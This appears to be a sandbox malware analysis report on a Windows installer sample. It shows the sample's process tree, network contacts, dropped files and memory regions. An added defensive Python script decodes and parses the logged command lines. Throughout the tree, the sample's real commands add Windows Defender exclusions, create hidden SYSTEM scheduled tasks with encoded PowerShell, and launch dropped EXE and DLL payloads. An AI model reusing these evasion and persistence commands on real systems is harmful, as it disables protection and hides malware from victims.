C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gSFREmtFc" /SC once /ST 09:28:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gSFREmtFc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gSFREmtFc"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 11:21:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe\" F0 /GMsite_idmAX 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe F0 /GMsite_idmAX 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\IyrDVE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\aewiCMC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 05:24:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll\",#1 /YUsite_idAJG 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll",#1 /YUsite_idAJG 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll",#1 /YUsite_idAJG 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"
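
The process tree above shows the evasion and persistence chain in order: the sample spawns cmd.exe and reg.exe to write its drop directories and the Chrome and Edge extension directories as values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths (once per registry view, /reg:32 and /reg:64), creates a one-shot scheduled task whose -EncodedCommand payload decodes to start-process -WindowStyle Hidden gpupdate.exe /force so the policy-managed exclusions take effect immediately (the gpupdate.exe /force process follows in the tree), then registers further tasks as SYSTEM that launch the dropped ZBAfLYQ.exe and the rundll32 DLL exports, deleting each one-shot task after use. The WMIC MSFT_MpPreference Remove ExclusionExtension=exe call is reached through forfiles /p c:\windows\system32 /m cmd.exe /c, an extra indirection layer. The Python script below is an added triage example and is not part of this report or the sample: it takes a handful of command lines copied from the tree (embedded as constructed sample input), decodes the UTF-16LE base64 -EncodedCommand payload, extracts the exclusion entries written to the policy key, and parses the schtasks /CREATE arguments including the \" escapes inside /TR. The regular expressions are this example's own assumptions about the command-line syntax seen here, not a general Windows command-line parser.

```python
import base64
import re

# Constructed sample input: command lines copied from the behavioral1 process
# tree of this report (a handful of the several hundred lines it contains).
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32',
    r'schtasks /CREATE /TN "gSFREmtFc" /SC once /ST 09:28:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 11:21:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe\" F0 /GMsite_idmAX 385118 /S" /V1 /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\IyrDVE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F',
]

# reg.exe ADD into the policy-managed Defender exclusion keys (assumed syntax,
# matches the "reg ADD" / "reg.exe" ADD forms in the tree; case-insensitive).
REG_ADD = re.compile(r'\breg(?:\.exe)?"?\s+add\b', re.I)
DEFENDER_EXCL_KEY = re.compile(r'Windows Defender\\Exclusions\\(Paths|Extensions|Processes)', re.I)
REG_VALUE = re.compile(r'/v\s+(?:"([^"]+)"|(\S+))', re.I)
# powershell accepts -e, -ec, -enc and -EncodedCommand for the base64 argument.
ENCODED = re.compile(r'(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)', re.I)
SCHTASKS_CREATE = re.compile(r'^schtasks\s+/create\b', re.I)


def defender_exclusion(cmdline):
    """Return (kind, value) when cmdline adds a value under a Defender policy
    Exclusions key, else None. kind is 'paths', 'extensions' or 'processes'."""
    key = DEFENDER_EXCL_KEY.search(cmdline)
    if not key or not REG_ADD.search(cmdline):
        return None
    val = REG_VALUE.search(cmdline)
    if not val:
        return None
    return (key.group(1).lower(), val.group(1) or val.group(2))


def decode_encoded_command(cmdline):
    """Decode a powershell -EncodedCommand payload: base64 of UTF-16LE text."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def schtasks_create(cmdline):
    """Parse the /TN, /RU, /SC, /TR and /XML arguments of a schtasks /CREATE line.
    Quoted values may contain \\" escapes (used here to quote paths inside /TR);
    those are unescaped. Caveat: a value ending in a backslash before its closing
    quote would be read as an escape, which does not occur in this report."""
    if not SCHTASKS_CREATE.match(cmdline):
        return None
    fields = {}
    for key in ("TN", "RU", "SC", "TR", "XML"):
        m = re.search(r'/%s\s+(?:"((?:\\.|[^"\\])*)"|(\S+))' % key, cmdline, re.I)
        if m:
            val = m.group(1) if m.group(1) is not None else m.group(2)
            fields[key.lower()] = val.replace('\\"', '"')
    return fields


def triage(cmdlines):
    """Collect exclusions, decoded PowerShell payloads and created tasks
    from a list of command lines, de-duplicating the first two."""
    found = {"exclusions": [], "decoded": [], "tasks": []}
    for line in cmdlines:
        excl = defender_exclusion(line)
        if excl and excl not in found["exclusions"]:
            found["exclusions"].append(excl)
        dec = decode_encoded_command(line)
        if dec and dec not in found["decoded"]:
            found["decoded"].append(dec)
        task = schtasks_create(line)
        if task:
            found["tasks"].append(task)
    return found


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_CMDLINES), indent=2))
```

Run against the six sample lines it reports two policy exclusions, the single decoded payload start-process -WindowStyle Hidden gpupdate.exe /force, and three tasks (gSFREmtFc as Admin, aUYdFpynDtMaquqaO and yozVwwMRZiDXbVH as SYSTEM, the last with /SC ONLOGON). On a live host the same exclusions would be visible in the ExclusionPath property of Get-MpPreference once the policy has been refreshed, which is exactly what the gpupdate /force step achieves.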

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 46.206.58.216.in-addr.arpa udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
DE 216.58.206.46:443 clients2.google.com tcp
US 44.239.141.158:80 api4.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe

MD5 6248fde83e7929ff0561fd033b68d11c
SHA1 2ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA256 66959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA512 80bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33

memory/3416-8-0x0000000000AE0000-0x000000000119E000-memory.dmp

memory/3416-9-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/2388-13-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/2388-12-0x0000000003420000-0x0000000003456000-memory.dmp

memory/2388-14-0x00000000056F0000-0x0000000005700000-memory.dmp

memory/2388-15-0x00000000056F0000-0x0000000005700000-memory.dmp

memory/2388-16-0x0000000005D30000-0x000000000635A000-memory.dmp

memory/2388-17-0x0000000005A70000-0x0000000005A92000-memory.dmp

memory/2388-18-0x0000000005C10000-0x0000000005C76000-memory.dmp

memory/2388-24-0x0000000005C80000-0x0000000005CE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hy0axecc.aj0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2388-28-0x0000000006560000-0x00000000068B7000-memory.dmp

memory/2388-29-0x0000000006900000-0x000000000691E000-memory.dmp

memory/2388-30-0x0000000006940000-0x000000000698C000-memory.dmp

memory/2388-33-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/3416-37-0x0000000000AE0000-0x000000000119E000-memory.dmp

memory/3016-39-0x0000000000B30000-0x00000000011EE000-memory.dmp

memory/3016-40-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/1304-43-0x0000000073310000-0x0000000073AC1000-memory.dmp

memory/1304-44-0x0000000001A80000-0x0000000001A90000-memory.dmp

memory/1304-45-0x0000000001A80000-0x0000000001A90000-memory.dmp

memory/1304-54-0x0000000004B70000-0x0000000004EC7000-memory.dmp

memory/1304-55-0x0000000005160000-0x00000000051AC000-memory.dmp

memory/1304-58-0x0000000073310000-0x0000000073AC1000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 aebf4bf6752c28a76f012ad901a1b27e
SHA1 9609832f721f53d59f2d01b9d740649f44f965ea
SHA256 73316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512 dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50

memory/2272-60-0x0000000073310000-0x0000000073AC1000-memory.dmp

memory/2272-61-0x00000000036F0000-0x0000000003700000-memory.dmp

memory/2272-62-0x00000000036F0000-0x0000000003700000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cb05fea752fdc8d953aa1e59fb9a836a
SHA1 d727eaff2eb5cd7a2153f1652f86f591cf03bb9c
SHA256 3995a2e60f2c99b08a70e82a15a6a710153223f5cdeb7762108b424649cbc7bc
SHA512 52688106e4748583426e7f6472964d4f23e33e499b91a2339adef0813351c276130ac4f9a2cb6874399ce251a78bde30168ddad03a01d494dc58bd56cd8e9450

memory/2272-73-0x0000000073310000-0x0000000073AC1000-memory.dmp

memory/4728-77-0x00000160EEF40000-0x00000160EEF50000-memory.dmp

memory/4728-76-0x00007FFBBC8A0000-0x00007FFBBD362000-memory.dmp

memory/4728-86-0x00000160EEF00000-0x00000160EEF22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6083300bc21c231a3e28a06480b4e0c2
SHA1 5af05f83ca95aa75e2605ab14d78c5a39237da95
SHA256 d674b3f7367d5d1663cdc417d031bb5d0ef09cc82eb11e3afeba6613ff1ef912
SHA512 7bd78028589a8985428f70c0a468b6c22d57e4ba0eb2c6929bc7e76ee06690fd448f0f13a5a5f8c6a8c9d752765fac6167cc98c4079e0d12a3c5445f5bf87cf0

memory/4728-88-0x00000160EEF40000-0x00000160EEF50000-memory.dmp

memory/4728-91-0x00007FFBBC8A0000-0x00007FFBBD362000-memory.dmp

memory/3016-92-0x0000000000B30000-0x00000000011EE000-memory.dmp

memory/3016-97-0x0000000000B30000-0x00000000011EE000-memory.dmp

memory/5100-98-0x0000000000D30000-0x00000000013EE000-memory.dmp

memory/5100-99-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/5100-110-0x0000000002C70000-0x0000000002CF5000-memory.dmp

memory/2008-112-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/2008-113-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/2008-115-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/2008-129-0x00000000042C0000-0x0000000004617000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 45209db688518b9958ae0454ae5f4330
SHA1 73890462e4c3c27855e2a425b18c28d1c0c77a85
SHA256 9044b84cd815839bad36b70c7609e77fde883c8bd5dccb48cc96a4086be0adaa
SHA512 2e1b748c5c98e3f42805e9e0b8fe55c2d7da18ee8ca44fc075468fd93214106a26e0f9f7ad8339adeabb93ebdf4ba9e9754015fc964c6ec8456f6e7f0df3e513

memory/2008-147-0x00000000048B0000-0x00000000048FC000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 4d1165402f9f90e5df03fb0aa780956d
SHA1 7abbd70ce215fa46ae527d7f73053f7d67227211
SHA256 b0342b0b1d056fc581d0d07c9a077fdcfa079382e46e859d2178b50fb1a424ad
